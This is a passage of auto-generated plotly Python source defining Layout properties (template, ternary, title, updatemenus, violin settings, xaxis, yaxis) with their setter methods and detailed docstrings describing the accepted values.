Alternatively, this may be specified as an instance of
plotly.graph_objs.layout.Template. Trace templates are applied
cyclically to traces of each type. Container arrays (eg
`annotations`) have special handling: An object ending in
`defaults` (eg `annotationdefaults`) is applied to each array
item. But if an item has a `templateitemname` key we look in
the template array for an item with matching `name` and apply
that instead. If no matching `name` is found we mark the item
invisible. Any named template item not referenced is appended
to the end of the array, so this can be used to add a watermark
annotation or a logo image, for example. To omit one of these
items on the plot, make an item with matching
`templateitemname` and `visible: false`.
The 'template' property is an instance of Template
that may be specified as:
- An instance of plotly.graph_objs.layout.Template
- A dict of string/value properties that will be passed
to the Template constructor
Supported dict properties:
data
plotly.graph_objs.layout.template.Data instance
or dict with compatible properties
layout
plotly.graph_objs.layout.template.Layout
instance or dict with compatible properties
- The name of a registered template where current registered templates
are stored in the plotly.io.templates configuration object. The names
of all registered templates can be retrieved with:
>>> import plotly.io as pio
>>> list(pio.templates)
- A string containing multiple registered template names, joined on '+'
characters (e.g. 'template1+template2'). In this case the resulting
template is computed by merging together the collection of registered
templates
Returns
-------
plotly.graph_objs.layout.Template
"""
return self['template']
@template.setter
def template(self, val):
self['template'] = val
# ternary
# -------
@property
def ternary(self):
"""
The 'ternary' property is an instance of Ternary
that may be specified as:
- An instance of plotly.graph_objs.layout.Ternary
- A dict of string/value properties that will be passed
to the Ternary constructor
Supported dict properties:
aaxis
plotly.graph_objs.layout.ternary.Aaxis instance
or dict with compatible properties
baxis
plotly.graph_objs.layout.ternary.Baxis instance
or dict with compatible properties
bgcolor
Set the background color of the subplot
caxis
plotly.graph_objs.layout.ternary.Caxis instance
or dict with compatible properties
domain
plotly.graph_objs.layout.ternary.Domain
instance or dict with compatible properties
sum
The number each triplet should sum to, and the
maximum range of each axis
Returns
-------
plotly.graph_objs.layout.Ternary
"""
return self['ternary']
@ternary.setter
def ternary(self, val):
self['ternary'] = val
# title
# -----
@property
def title(self):
"""
Sets the plot's title.
The 'title' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self['title']
@title.setter
def title(self, val):
self['title'] = val
# titlefont
# ---------
@property
def titlefont(self):
"""
Sets the title font.
The 'titlefont' property is an instance of Titlefont
that may be specified as:
- An instance of plotly.graph_objs.layout.Titlefont
- A dict of string/value properties that will be passed
to the Titlefont constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly.graph_objs.layout.Titlefont
"""
return self['titlefont']
@titlefont.setter
def titlefont(self, val):
self['titlefont'] = val
# updatemenus
# -----------
@property
def updatemenus(self):
"""
The 'updatemenus' property is a tuple of instances of
Updatemenu that may be specified as:
- A list or tuple of instances of plotly.graph_objs.layout.Updatemenu
- A list or tuple of dicts of string/value properties that
will be passed to the Updatemenu constructor
Supported dict properties:
active
Determines which button (by index starting from
0) is considered active.
bgcolor
Sets the background color of the update menu
buttons.
bordercolor
Sets the color of the border enclosing the
update menu.
borderwidth
Sets the width (in px) of the border enclosing
the update menu.
buttons
plotly.graph_objs.layout.updatemenu.Button
instance or dict with compatible properties
buttondefaults
When used in a template (as layout.template.lay
out.updatemenu.buttondefaults), sets the
default property values to use for elements of
layout.updatemenu.buttons
direction
Determines the direction in which the buttons
are laid out, whether in a dropdown menu or a
row/column of buttons. For `left` and `up`, the
buttons will still appear in left-to-right or
top-to-bottom order respectively.
font
Sets the font of the update menu button text.
name
When used in a template, named items are
created in the output figure in addition to any
items the figure already has in this array. You
can modify these items in the output figure by
making your own item with `templateitemname`
matching this `name` alongside your
modifications (including `visible: false` or
`enabled: false` to hide it). Has no effect
outside of a template.
pad
Sets the padding around the buttons or dropdown
menu.
showactive
Highlights active dropdown item or active
button if true.
templateitemname
Used to refer to a named item in this array in
the template. Named items from the template
will be created even without a matching item in
the input figure, but you can modify one by
making an item with `templateitemname` matching
its `name`, alongside your modifications
(including `visible: false` or `enabled: false`
to hide it). If there is no template or no
matching item, this item will be hidden unless
you explicitly show it with `visible: true`.
type
Determines whether the buttons are accessible
via a dropdown menu or whether the buttons are
stacked horizontally or vertically
visible
Determines whether or not the update menu is
visible.
x
Sets the x position (in normalized coordinates)
of the update menu.
xanchor
Sets the update menu's horizontal position
anchor. This anchor binds the `x` position to
the "left", "center" or "right" of the range
selector.
y
Sets the y position (in normalized coordinates)
of the update menu.
yanchor
Sets the update menu's vertical position anchor
This anchor binds the `y` position to the
"top", "middle" or "bottom" of the range
selector.
Returns
-------
tuple[plotly.graph_objs.layout.Updatemenu]
"""
return self['updatemenus']
@updatemenus.setter
def updatemenus(self, val):
self['updatemenus'] = val
# updatemenudefaults
# ------------------
@property
def updatemenudefaults(self):
"""
When used in a template (as
layout.template.layout.updatemenudefaults), sets the default
property values to use for elements of layout.updatemenus
The 'updatemenudefaults' property is an instance of Updatemenu
that may be specified as:
- An instance of plotly.graph_objs.layout.Updatemenu
- A dict of string/value properties that will be passed
to the Updatemenu constructor
Supported dict properties:
Returns
-------
plotly.graph_objs.layout.Updatemenu
"""
return self['updatemenudefaults']
@updatemenudefaults.setter
def updatemenudefaults(self, val):
self['updatemenudefaults'] = val
# violingap
# ---------
@property
def violingap(self):
"""
Sets the gap (in plot fraction) between violins of adjacent
location coordinates.
The 'violingap' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['violingap']
@violingap.setter
def violingap(self, val):
self['violingap'] = val
# violingroupgap
# --------------
@property
def violingroupgap(self):
"""
Sets the gap (in plot fraction) between violins of the same
location coordinate.
The 'violingroupgap' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self['violingroupgap']
@violingroupgap.setter
def violingroupgap(self, val):
self['violingroupgap'] = val
# violinmode
# ----------
@property
def violinmode(self):
"""
Determines how violins at the same location coordinate are
displayed on the graph. If "group", the violins are plotted
next to one another centered around the shared location. If
"overlay", the violins are plotted over one another, you might
need to set "opacity" to see them multiple violins.
The 'violinmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['group', 'overlay']
Returns
-------
Any
"""
return self['violinmode']
@violinmode.setter
def violinmode(self, val):
self['violinmode'] = val
# width
# -----
@property
def width(self):
"""
Sets the plot's width (in px).
The 'width' property is a number and may be specified as:
- An int or float in the interval [10, inf]
Returns
-------
int|float
"""
return self['width']
@width.setter
def width(self, val):
self['width'] = val
# xaxis
# -----
@property
def xaxis(self):
"""
The 'xaxis' property is an instance of XAxis
that may be specified as:
- An instance of plotly.graph_objs.layout.XAxis
- A dict of string/value properties that will be passed
to the XAxis constructor
Supported dict properties:
anchor
If set to an opposite-letter axis id (e.g.
`x2`, `y`), this axis is bound to the
corresponding opposite-letter axis. If set to
"free", this axis' position is determined by
`position`.
automargin
Determines whether long tick labels
automatically grow the figure margins.
autorange
Determines whether or not the range of this
axis is computed in relation to the input data.
See `rangemode` for more info. If `range` is
provided, then `autorange` is set to False.
calendar
Sets the calendar system to use for `range` and
`tick0` if this is a date axis. This does not
set the calendar for interpreting data on this
axis, that's specified in the trace or via the
global `layout.calendar`
categoryarray
Sets the order in which categories on this axis
appear. Only has an effect if `categoryorder`
is set to "array". Used with `categoryorder`.
categoryarraysrc
Sets the source reference on plot.ly for
categoryarray .
categoryorder
Specifies the ordering logic for the case of
categorical variables. By default, plotly uses
"trace", which specifies the order that is
present in the data supplied. Set
`categoryorder` to *category ascending* or
*category descending* if order should be
determined by the alphanumerical order of the
category names. Set `categoryorder` to "array"
to derive the ordering from the attribute
`categoryarray`. If a category is not found in
the `categoryarray` array, the sorting behavior
for that attribute will be identical to the
"trace" mode. The unspecified categories will
follow the categories in `categoryarray`.
color
Sets default for all colors associated with
this axis all at once: line, font, tick, and
grid colors. Grid color is lightened by
blending this with the plot background
Individual pieces can override this.
constrain
If this axis needs to be compressed (either due
to its own `scaleanchor` and `scaleratio` or
those of the other axis), determines how that
happens: by increasing the "range" (default),
or by decreasing the "domain".
constraintoward
If this axis needs to be compressed (either due
to its own `scaleanchor` and `scaleratio` or
those of the other axis), determines which
direction we push the originally specified plot
area. Options are "left", "center" (default),
and "right" for x axes, and "top", "middle"
(default), and "bottom" for y axes.
domain
Sets the domain of this axis (in plot
fraction).
dtick
Sets the step in-between ticks on this axis.
Use with `tick0`. Must be a positive number, or
special strings available to "log" and "date"
axes. If the axis `type` is "log", then ticks
are set every 10^(n*dtick) where n is the tick
number. For example, to set a tick mark at 1,
10, 100, 1000, ... set dtick to 1. To set tick
marks at 1, 100, 10000, ... set dtick to 2. To
set tick marks at 1, 5, 25, 125, 625, 3125, ...
set dtick to log_10(5), or 0.69897000433. "log"
has several special values; "L<f>", where `f`
is a positive number, gives ticks linearly
spaced in value (but not position). For example
`tick0` = 0.1, `dtick` = "L0.5" will put ticks
at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10
plus small digits between, use "D1" (all
digits) or "D2" (only 2 and 5). `tick0` is
ignored for "D1" and "D2". If the axis `type`
is "date", then you must convert the time to
milliseconds. For example, to set the interval
between ticks to one day, set `dtick` to
86400000.0. "date" also has special values
"M<n>" gives ticks spaced by a number of
months. `n` must be a positive integer. To set
ticks on the 15th of every third month, set
`tick0` to "2000-01-15" and `dtick` to "M3". To
set ticks every 4 years, set `dtick` to "M48"
exponentformat
Determines a formatting rule for the tick
exponents. For example, consider the number
1,000,000,000. If "none", it appears as
1,000,000,000. If "e", 1e+9. If "E", 1E+9. If
"power", 1x10^9 (with 9 in a super script). If
"SI", 1G. If "B", 1B.
fixedrange
Determines whether or not this axis is zoom-
able. If true, then zoom is disabled.
gridcolor
Sets the color of the grid lines.
gridwidth
Sets the width (in px) of the grid lines.
hoverformat
Sets the hover text formatting rule using d3
formatting mini-languages which are very
similar to those in Python. For numbers, see: h
ttps://github.com/d3/d3-format/blob/master/READ
ME.md#locale_format And for dates see:
https://github.com/d3/d3-time-
format/blob/master/README.md#locale_format We
add one item to d3's date formatter: "%{n}f"
for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with
tickformat "%H~%M~%S.%2f" would display
"09~15~23.46"
layer
Sets the layer on which this axis is displayed.
If *above traces*, this axis is displayed above
all the subplot's traces If *below traces*,
this axis is displayed below all the subplot's
traces, but above the grid lines. Useful when
used together with scatter-like traces with
`cliponaxis` set to False to show markers
and/or text nodes above this axis.
linecolor
Sets the axis line color.
linewidth
Sets the width (in px) of the axis line.
mirror
Determines if the axis lines or/and ticks are
mirrored to the opposite side of the plotting
area. If True, the axis lines are mirrored. If
"ticks", the axis lines and ticks are mirrored.
If False, mirroring is disable. If "all", axis
lines are mirrored on all shared-axes subplots.
If "allticks", axis lines and ticks are
mirrored on all shared-axes subplots.
nticks
Specifies the maximum number of ticks for the
particular axis. The actual number of ticks
will be chosen automatically to be less than or
equal to `nticks`. Has an effect only if
`tickmode` is set to "auto".
overlaying
If set a same-letter axis id, this axis is
overlaid on top of the corresponding same-
letter axis, with traces and axes visible for
both axes. If False, this axis does not overlay
any same-letter axes. In this case, for axes
with overlapping domains only the highest-
numbered axis will be visible.
position
Sets the position of this axis in the plotting
space (in normalized coordinates). Only has an
effect if `anchor` is set to "free".
range
Sets the range of this axis. If the axis `type`
is "log", then you must take the log of your
desired range (e.g. to set the range from 1 to
100, set the range from 0 to 2). If the axis
`type` is "date", it should be date strings,
like date data, though Date objects and unix
milliseconds will be accepted and converted to
strings. If the axis `type` is "category", it
should be numbers, using the scale where each
category is assigned a serial number from zero
in the order it appears.
rangemode
If "normal", the range is computed in relation
to the extrema of the input data. If *tozero*`,
the range extends to 0, regardless of the input
data If "nonnegative", the range is non-
negative, regardless of the input data. Applies
only to linear axes.
rangeselector
plotly.graph_objs.layout.xaxis.Rangeselector
instance or dict with compatible properties
rangeslider
plotly.graph_objs.layout.xaxis.Rangeslider
instance or dict with compatible properties
scaleanchor
If set to another axis id (e.g. `x2`, `y`), the
range of this axis changes together with the
range of the corresponding axis such that the
scale of pixels per unit is in a constant
ratio. Both axes are still zoomable, but when
you zoom one, the other will zoom the same
amount, keeping a fixed midpoint. `constrain`
and `constraintoward` determine how we enforce
the constraint. You can chain these, ie `yaxis:
{scaleanchor: *x*}, xaxis2: {scaleanchor: *y*}`
but you can only link axes of the same `type`.
The linked axis can have the opposite letter
(to constrain the aspect ratio) or the same
letter (to match scales across subplots). Loops
(`yaxis: {scaleanchor: *x*}, xaxis:
{scaleanchor: *y*}` or longer) are redundant
and the last constraint encountered will be
ignored to avoid possible inconsistent
constraints via `scaleratio`.
scaleratio
If this axis is linked to another by
`scaleanchor`, this determines the pixel to
unit scale ratio. For example, if this value is
10, then every unit on this axis spans 10 times
the number of pixels as a unit on the linked
axis. Use this for example to create an
elevation profile where the vertical scale is
exaggerated a fixed amount with respect to the
horizontal.
separatethousands
If "true", even 4-digit integers are separated
showexponent
If "all", all exponents are shown besides their
significands. If "first", only the exponent of
the first tick is shown. If "last", only the
exponent of the last tick is shown. If "none",
no exponents appear.
showgrid
Determines whether or not grid lines are drawn.
If True, the grid lines are drawn at every tick
mark.
showline
Determines whether or not a line bounding this
axis is drawn.
showspikes
Determines whether or not spikes (aka
droplines) are drawn for this axis. Note: This
only takes affect when hovermode = closest
showticklabels
Determines whether or not the tick labels are
drawn.
showtickprefix
If "all", all tick labels are displayed with a
prefix. If "first", only the first tick is
displayed with a prefix. If "last", only the
last tick is displayed with a suffix. If
"none", tick prefixes are hidden.
showticksuffix
Same as `showtickprefix` but for tick suffixes.
side
Determines whether a x (y) axis is positioned
at the "bottom" ("left") or "top" ("right") of
the plotting area.
spikecolor
Sets the spike color. If undefined, will use
the series color
spikedash
Sets the dash style of lines. Set to a dash
type string ("solid", "dot", "dash",
"longdash", "dashdot", or "longdashdot") or a
dash length list in px (eg "5px,10px,2px,2px").
spikemode
Determines the drawing mode for the spike line
If "toaxis", the line is drawn from the data
point to the axis the series is plotted on. If
"across", the line is drawn across the entire
plot area, and supercedes "toaxis". If
"marker", then a marker dot is drawn on the
axis the series is plotted on
spikesnap
Determines whether spikelines are stuck to the
cursor or to the closest datapoints.
spikethickness
Sets the width (in px) of the zero line.
tick0
Sets the placement of the first tick on this
axis. Use with `dtick`. If the axis `type` is
"log", then you must take the log of your
starting tick (e.g. to set the starting tick to
100, set the `tick0` to 2) except when
`dtick`=*L<f>* (see `dtick` for more info). If
the axis `type` is "date", it should be a date
string, like date data. If the axis `type` is
"category", it should be a number, using the
scale where each category is assigned a serial
number from zero in the order it appears.
tickangle
Sets the angle of the tick labels with respect
to the horizontal. For example, a `tickangle`
of -90 draws the tick labels vertically.
tickcolor
Sets the tick color.
tickfont
Sets the tick font.
tickformat
Sets the tick label formatting rule using d3
formatting mini-languages which are very
similar to those in Python. For numbers, see: h
ttps://github.com/d3/d3-format/blob/master/READ
ME.md#locale_format And for dates see:
https://github.com/d3/d3-time-
format/blob/master/README.md#locale_format We
add one item to d3's date formatter: "%{n}f"
for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with
tickformat "%H~%M~%S.%2f" would display
"09~15~23.46"
tickformatstops
plotly.graph_objs.layout.xaxis.Tickformatstop
instance or dict with compatible properties
tickformatstopdefaults
When used in a template (as layout.template.lay
out.xaxis.tickformatstopdefaults), sets the
default property values to use for elements of
layout.xaxis.tickformatstops
ticklen
Sets the tick length (in px).
tickmode
Sets the tick mode for this axis. If "auto",
the number of ticks is set via `nticks`. If
"linear", the placement of the ticks is
determined by a starting position `tick0` and a
tick step `dtick` ("linear" is the default
value if `tick0` and `dtick` are provided). If
"array", the placement of the ticks is set via
`tickvals` and the tick text is `ticktext`.
("array" is the default value if `tickvals` is
provided).
tickprefix
Sets a tick label prefix.
ticks
Determines whether ticks are drawn or not. If
"", this axis' ticks are not drawn. If
"outside" ("inside"), this axis' are drawn
outside (inside) the axis lines.
ticksuffix
Sets a tick label suffix.
ticktext
Sets the text displayed at the ticks position
via `tickvals`. Only has an effect if
`tickmode` is set to "array". Used with
`tickvals`.
ticktextsrc
Sets the source reference on plot.ly for
ticktext .
tickvals
Sets the values at which ticks on this axis
appear. Only has an effect if `tickmode` is set
to "array". Used with `ticktext`.
tickvalssrc
Sets the source reference on plot.ly for
tickvals .
tickwidth
Sets the tick width (in px).
title
Sets the title of this axis.
titlefont
Sets this axis' title font.
type
Sets the axis type. By default, plotly attempts
to determined the axis type by looking into the
data of the traces that referenced the axis in
question.
visible
A single toggle to hide the axis while
preserving interaction like dragging. Default
is true when a cheater plot is present on the
axis, otherwise false
zeroline
Determines whether or not a line is drawn at
along the 0 value of this axis. If True, the
zero line is drawn on top of the grid lines.
zerolinecolor
Sets the line color of the zero line.
zerolinewidth
Sets the width (in px) of the zero line.
Returns
-------
plotly.graph_objs.layout.XAxis
"""
return self['xaxis']
@xaxis.setter
def xaxis(self, val):
self['xaxis'] = val
# yaxis
# -----
@property
def yaxis(self):
"""
The 'yaxis' property is an instance of YAxis
that may be specified as:
- An instance of plotly.graph_objs.layout.YAxis
- A dict of string/value properties that will be passed
to the YAxis constructor
Supported dict properties:
anchor
If set to an opposite-letter axis id (e.g.
`x2`, `y`), this axis is bound to the
corresponding opposite-letter axis. If set to
"free", this axis' position is determined by
`position`.
automargin
Determines whether long tick labels
automatically grow the figure margins.
autorange
Determines whether or not the range of this
axis is computed in relation to the input data.
See `rangemode` for more info. If `range` is
provided, then `autorange` is set to False.
calendar
Sets the calendar system to use for `range` and
`tick0` if this is a date axis. This does not
set the calendar for interpreting data on this
axis, that's specified in the trace or via the
global `layout.calendar`
categoryarray
Sets the order in which categories on this axis
appear. Only has an effect if `categoryorder`
is set to "array". Used with `categoryorder`.
categoryarraysrc
Sets the source reference on plot.ly for
categoryarray .
categoryorder
Specifies the ordering logic for the case of
categorical variables. By default, plotly uses
"trace", which specifies the order that is
present in the data supplied. Set
`categoryorder` to *category ascending* or
*category descending* if order should be
determined by the alphanumerical order of the
category names. Set `categoryorder` to "array"
to derive the ordering from the attribute
`categoryarray`. If a category is not found in
the `categoryarray` array, the sorting behavior
for that attribute will be identical to the
"trace" mode. The unspecified categories will
follow the categories in `categoryarray`.
color
Sets default for all colors associated with
this axis all at once: line, font, tick, and
grid colors. Grid color is lightened by
blending this with the plot background
Individual pieces can override this.
constrain
If this axis needs to be compressed (either due
to its own `scaleanchor` and `scaleratio` or
those of the other axis), determines how that
happens: by increasing the "range" (default),
or by decreasing the "domain".
constraintoward
If this axis needs to be compressed (either due
to its own `scaleanchor` and `scaleratio` or
those of the other axis), determines which
direction we push the originally specified plot
area. Options are "left", "center" (default),
and "right" for x axes, and "top", "middle"
(default), and "bottom" for y axes.
domain
Sets the domain of this axis (in plot
fraction).
dtick
Sets the step in-between ticks on this axis.
Use with `tick0`. Must be a positive number, or
special strings available to "log" and "date"
axes. If the axis `type` is "log", then ticks
are set every 10^(n*dtick) where n is the tick
number. For example, to set a tick mark at 1,
10, 100, 1000, ... set dtick to 1. To set tick
marks at 1, 100, 10000, ... set dtick to 2. To
set tick marks at 1, 5, 25, 125, 625, 3125, ...
set dtick to log_10(5), or 0.69897000433. "log"
has several special values; "L<f>", where `f`
is a positive number, gives ticks linearly
spaced in value (but not position). For example
`tick0` = 0.1, `dtick` = "L0.5" will put ticks
at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10
plus small digits between, use "D1" (all
digits) or "D2" (only 2 and 5). `tick0` is
ignored for "D1" and "D2". If the axis `type`
is "date", then you must convert the time to
milliseconds. For example, to set the interval
between ticks to one day, set `dtick` to
86400000.0. "date" also has special values
"M<n>" gives ticks spaced by a number of
months. `n` must be a positive integer. To set
ticks on the 15th of every third month, set
`tick0` to "2000-01-15" and `dtick` to "M3". To
set ticks every 4 years, set `dtick` to "M48"
exponentformat
Determines a formatting rule for the tick
exponents. For example, consider the number
1,000,000,000. If "none", it appears as
1,000,000,000. If "e", 1e+9. If "E", 1E+9. If
"power", 1x10^9 (with 9 in a super script). If
"SI", 1G. If "B", 1B.
fixedrange
Determines whether or not this axis is zoom-
able. If true, then zoom is disabled.
gridcolor
Sets the color of the grid lines.
gridwidth
Sets the width (in px) of the grid lines.
hoverformat
Sets the hover text formatting rule using d3
formatting mini-languages which are very
similar to those in Python. For numbers, see: h
ttps://github.com/d3/d3-format/blob/master/READ
ME.md#locale_format And for dates see:
https://github.com/d3/d3-time-
format/blob/master/README.md#locale_format We
add one item to d3's date formatter: "%{n}f"
for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with
tickformat "%H~%M~%S.%2f" would display
"09~15~23.46"
layer
Sets the layer on which this axis is displayed.
If *above traces*, this axis is displayed above
all the subplot's traces If *below traces*,
this axis is displayed below all the subplot's
traces, but above the grid lines. Useful when
used together with scatter-like traces with
`cliponaxis` set to False to show markers
and/or text nodes above this axis.
linecolor
Sets the axis line color.
linewidth
Sets the width (in px) of the axis line.
mirror
Determines if the axis lines or/and ticks are
mirrored to the opposite side of the plotting
area. If True, the axis lines are mirrored. If
"ticks", the axis lines and ticks are mirrored.
If False, mirroring is disable. If "all", axis
lines are mirrored on all shared-axes subplots.
If "allticks", axis lines and ticks are
mirrored on all shared-axes subplots.
nticks
Specifies the maximum number of ticks for the
particular axis. The actual number of ticks
will be chosen automatically to be less than or
equal to `nticks`. Has an effect only if
`tickmode` is set to "auto".
overlaying
If set a same-letter axis id, this axis is
overlaid on top of the corresponding same-
letter axis, with traces and axes visible for
both axes. If False, this axis does not overlay
any same-letter axes. In this case, for axes
with overlapping domains only the highest-
numbered axis will be visible.
position
Sets the position of this axis in the plotting
space (in normalized coordinates). Only has an
effect if `anchor` is set to "free".
range
Sets the range of this axis. If the axis `type`
is "log", then you must take the log of your
desired range (e.g. to set the range from 1 to
100, set the range from 0 to 2). If the axis
`type` is "date", it should be date strings,
like date data, though Date objects and unix
milliseconds will be accepted and converted to
strings. If the axis `type` is "category", it
should be numbers, using the scale where each
category is assigned a serial number from zero
in the order it appears.
rangemode
If "normal", the range is computed in relation
to the extrema of the input data. If *tozero*`,
the range extends to 0, regardless of the input
data If "nonnegative", the range is non-
negative, regardless of the input data. Applies
only to linear axes.
scaleanchor
If set to another axis id (e.g. `x2`, `y`), the
range of this axis changes together with the
range of the corresponding axis such that the
scale of pixels per unit is in a constant
ratio. Both axes are still zoomable, but when
you zoom one, the other will zoom the same
amount, keeping a fixed midpoint. `constrain`
and `constraintoward` determine how we enforce
the constraint. You can chain these, ie `yaxis:
{scaleanchor: *x*}, xaxis2: {scaleanchor: *y*}`
but you can only link axes of the same `type`.
The linked axis can have the opposite letter
(to constrain the aspect ratio) or the same
letter (to match scales across subplots). Loops
(`yaxis: {scaleanchor: *x*}, xaxis:
{scaleanchor: *y*}` or longer) are redundant
and the last constraint encountered will be
ignored to avoid possible inconsistent
constraints via `scaleratio`.
scaleratio
If this axis is linked to another by
`scaleanchor`, this determines the pixel to
unit scale ratio. For example, if this value is
10, then every unit on this axis spans 10 times
the number of pixels as a unit on the linked
axis. Use this for example to create an
elevation profile where the vertical scale is
exaggerated a fixed amount with respect to the
horizontal.
separatethousands
If "true", even 4-digit integers are separated
showexponent
If "all", all exponents are shown besides their
significands. If "first", only the exponent of
the first tick is shown. If "last", only the
exponent of the last tick is shown. If "none",
no exponents appear.
showgrid
Determines whether or not grid lines are drawn.
If True, the grid lines are drawn at every tick
mark.
showline
Determines whether or not a line bounding this
axis is drawn.
showspikes
Determines whether or not spikes (aka
droplines) are drawn for this axis. Note: This
only takes affect when hovermode = closest
showticklabels
Determines whether or not the tick labels are
drawn.
showtickprefix
If "all", all tick labels are displayed with a
prefix. If "first", only the first tick is
displayed with a prefix. If "last", only the
last tick is displayed with a suffix. If
"none", tick prefixes are hidden.
showticksuffix
Same as `showtickprefix` but for tick suffixes.
side
Determines whether a x (y) axis is positioned
at the "bottom" ("left") or "top" ("right") of
the plotting area.
spikecolor
Sets the spike color. If undefined, will use
the series color
spikedash
Sets the dash style of lines. Set to a dash
type string ("solid", "dot", "dash",
"longdash", "dashdot", or "longdashdot") or a
dash length list in px (eg "5px,10px,2px,2px").
spikemode
Determines the drawing mode for the spike line
If "toaxis", the line is drawn from the data
point to the axis the series is plotted on. If
"across", the line is drawn across the entire
plot area, and supercedes "toaxis". If
"marker", then a marker dot is drawn on the
axis the series is plotted on
spikesnap
Determines whether spikelines are stuck to the
cursor or to the closest datapoints.
spikethickness
Sets the width (in px) of the zero line.
tick0
Sets the placement of the first tick on this
axis. Use with `dtick`. If the axis `type` is
"log", then you must take the log of your
starting tick (e.g. to set the starting tick to
100, set the `tick0` to 2) except when
`dtick`=*L<f>* (see `dtick` for more info). If
the axis `type` is "date", it should be a date
string, like date data. If the axis `type` is
"category", it should be a number, using the
scale where each category is assigned a serial
number from zero in the order it appears.
tickangle
Sets the angle of the tick labels with respect
to the horizontal. For example, a `tickangle`
of -90 draws the tick labels vertically.
tickcolor
Sets the tick color.
tickfont
Sets the tick font.
tickformat
Sets the tick label formatting rule using d3
formatting mini-languages which are very
similar to those in Python. For numbers, see: h
ttps://github.com/d3/d3-format/blob/master/READ
ME.md#locale_format And for dates see:
https://github.com/d3/d3-time-
format/blob/master/README.md#locale_format We
add one item to d3's date formatter: "%{n}f"
for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with
tickformat "%H~%M~%S.%2f" would display
"09~15~23.46"
tickformatstops
plotly.graph_objs.layout.yaxis.Tickformatstop
instance or dict with compatible properties
tickformatstopdefaults
When used in a template (as layout.template.lay
out.yaxis.tickformatstopdefaults), sets the
default property values to use for elements of
layout.yaxis.tickformatstops
ticklen
Sets the tick length (in px).
tickmode
Sets the tick mode for this axis. If "auto",
the number of ticks is set via `nticks`. If
"linear", the placement of the ticks is
determined by a starting position `tick0` and a
tick step `dtick` ("linear" is the default
value if `tick0` and `dtick` are provided). If
"array", the placement of the ticks is set via
`tickvals` and the tick text is `ticktext`.
("array" is the default value if `tickvals` is
provided).
tickprefix
Sets a tick label prefix.
ticks
Determines whether ticks are drawn or not. If
"", this axis' ticks are not drawn. If
"outside" ("inside"), this axis' are drawn
outside (inside) the axis lines.
ticksuffix
Sets a tick label suffix.
ticktext
Sets the text displayed at the ticks position
via `tickvals`. Only has an effect if
`tickmode` is set to "array". Used with
`tickvals`.
ticktextsrc
Sets the source reference on plot.ly for
ticktext .
tickvals
Sets the values at which ticks on this axis
appear. Only has an effect if `tickmode` is set
to "array". Used with `ticktext`.
tickvalssrc
Sets the source reference on plot.ly for
tickvals .
tickwidth
Sets the tick width (in px).
title
Sets the title of this axis.
titlefont
Sets this axis' title font.
type
Sets the axis type. By default, plotly attempts
to determined the axis type by looking into the
data of the traces that referenced the axis in
question.
visible
A single toggle to hide the axis while
preserving interaction like dragging. Default
is true when a cheater plot is present on the
axis, otherwise false
zeroline
Determines whether or not a line is drawn at
along the 0 value of this axis. If True, the
zero line is drawn on top of the grid lines.
zerolinecolor
Sets the line color of the zero line.
zerolinewidth
Sets the width (in px) of the zero line.
Returns
-------
plotly.graph_objs.layout.YAxis
"""
return self['yaxis']
@yaxis.setter
def yaxis(self, val):
self['yaxis'] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return ''
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
angularaxis
plotly.graph_objs.layout.AngularAxis instance or dict
with compatible properties
annotations
plotly.graph_objs.layout.Annotation instance or dict
with compatible properties
annotationdefaults
When used in a template (as
layout.template.layout.annotationdefaults), sets the
default property values to use for elements of
layout.annotations
autosize
Determines whether or not a layout width or height that
has been left undefined by the user is initialized on
each relayout. Note that, regardless of this attribute,
an undefined layout width or height is always
initialized on the first call to plot.
bargap
Sets the gap (in plot fraction) between bars of
adjacent location coordinates.
bargroupgap
Sets the gap (in plot fraction) between bars of the
same location coordinate.
barmode
Determines how bars at the same location coordinate are
displayed on the graph. With "stack", the bars are
stacked on top of one another With "relative", the bars
are stacked on top of one another, with negative values
below the axis, positive values above With "group", the
bars are plotted next to one another centered around
the shared location. With "overlay", the bars are
plotted over one another, you might need to an
"opacity" to see multiple bars.
barnorm
Sets the normalization for bar traces on the graph.
With "fraction", the value of each bar is divided by
the sum of all values at that location coordinate.
"percent" is the same but multiplied by 100 to show
percentages.
boxgap
Sets the gap (in plot fraction) between boxes of
adjacent location coordinates.
boxgroupgap
Sets the gap (in plot fraction) between boxes of the
same location coordinate.
boxmode
Determines how boxes at the same location coordinate
are displayed on the graph. If "group", the boxes are
plotted next to one another centered around the shared
location. If "overlay", the boxes are plotted over one
another, you might need to set "opacity" to see them
multiple boxes.
calendar
Sets the default calendar system to use for
interpreting and displaying dates throughout the plot.
clickmode
Determines the mode of single click interactions.
"event" is the default value and emits the
`plotly_click` event. In addition this mode emits the
`plotly_selected` event in drag modes "lasso" and
"select", but with no event data attached (kept for
compatibility reasons). The "select" flag enables
selecting single data points via click. This mode also
supports persistent selections, meaning that pressing
Shift while clicking, adds to / subtracts from an
existing selection. "select" with `hovermode`: "x" can
be confusing, consider explicitly setting `hovermode`:
"closest" when using this feature. Selection events are
sent accordingly as long as "event" flag is set as
well. When the "event" flag is missing, `plotly_click`
and `plotly_selected` events are not fired.
colorway
Sets the default trace colors.
datarevision
If provided, a changed value tells `Plotly.react` that
one or more data arrays has changed. This way you can
modify arrays in-place rather than making a complete
new copy for an incremental change. If NOT provided,
`Plotly.react` assumes that data arrays are being
treated as immutable, thus any data array with a
different identity from its predecessor contains new
data.
direction
